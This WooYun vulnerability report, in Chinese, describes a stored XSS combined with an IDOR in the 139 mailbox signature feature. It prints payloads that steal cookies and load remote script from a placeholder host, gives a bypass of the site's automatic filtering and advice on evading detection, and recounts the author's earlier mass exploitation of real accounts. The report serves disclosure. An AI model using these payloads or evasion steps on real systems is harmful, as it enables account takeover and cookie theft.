WooYun.org

审核人员复现漏洞千万要记住，不要用alert prompt等关键字额，免得厂商还没处理，又被干掉了！
漏洞是利用储存型XSS+越权，可以控制百万的帐号，可以对帐号进行发短信，发邮件等操作。
最重要的是很隐蔽，难以被用户察觉，而且无需交互，就可以给大量用户埋下持久的XSS后门！
1 先说说漏洞点，在邮件的签名的编辑签名的位置，记得勾选上设置为默认。

2 编辑邮件前面，抓包，如下图。

3 post包是一个object，其中id位置是签名的id，也就是说，现在已经有600多万的有效签名了。
然后这个id是存在越权问题的，可以被越权修改他人的签名的权限。
然后content的位置就是签名的内容，是存在储存型XSS漏洞的。
虽然说这个XSS只能X自己，但是配合越权漏洞后，威力就可以插别人了！而且还是百万用户~
XSS poc：

<img src=x onerror=alert(1)>
<iframe style=display:none src=x onerror=alert(document.cookie)>
<iframe style=display:none src=x onerror=jQuery.getScript('//xxx/js')>

4 可以看到，这个XSS的触发点特别多，由于139邮箱的设计，其中有一段js文件，会在每个页面都加载 收件箱、邮件列表、还有个人签名的信息，所以会导致所有页面都会触发这个XSS！而且还是大概3-5分钟就会重新加载一次，也就是说如果保持页面不动，XSS每3-5分钟就会又触发一次。
点击写信，触发。

邮箱首页触发~

发短信的页面也会触发。利用xss可以给任意手机号以中招者的身份发短信~

5 然后正当我准备提交漏洞的时候，发现XSS漏洞竟然被修补了。然后想了想，肯定是因为139邮箱的自动回传检测修补机制干的，因为在前面截图证明的时候，把这玩意给忘了，所以使用了alert，导致被发现然后被修了，应该是自动检测修补机制吧。
那么没办法了，只能临时再去绕一绕了。
不一会儿，就绕过了，毕竟是自动只能修补，肯定只是会过滤上传的测试代码，不然也会影响业务的。
绕过后的XSS poc如下，很简单，换个标签就可以了。

<input onfocus=jQuery.getScript('//xxx/js') autofocus>

6 看看效果。

点击写信按钮。

首页也有加载我的js。

收件箱也是。

收个cookie截图下吧。

6 最后，再说说怎么利用，如下，固定写好xss代码，然后遍历去跑id就可以了。

然后根据不同时段的需求，去改js文件中的代码就可以了。
至于中招率，我2年前去遍历过1w个id，然后1天内有大概3k个左右的手机号中招了（手机号有进行去重过滤处理），所以中招率还是蛮高的。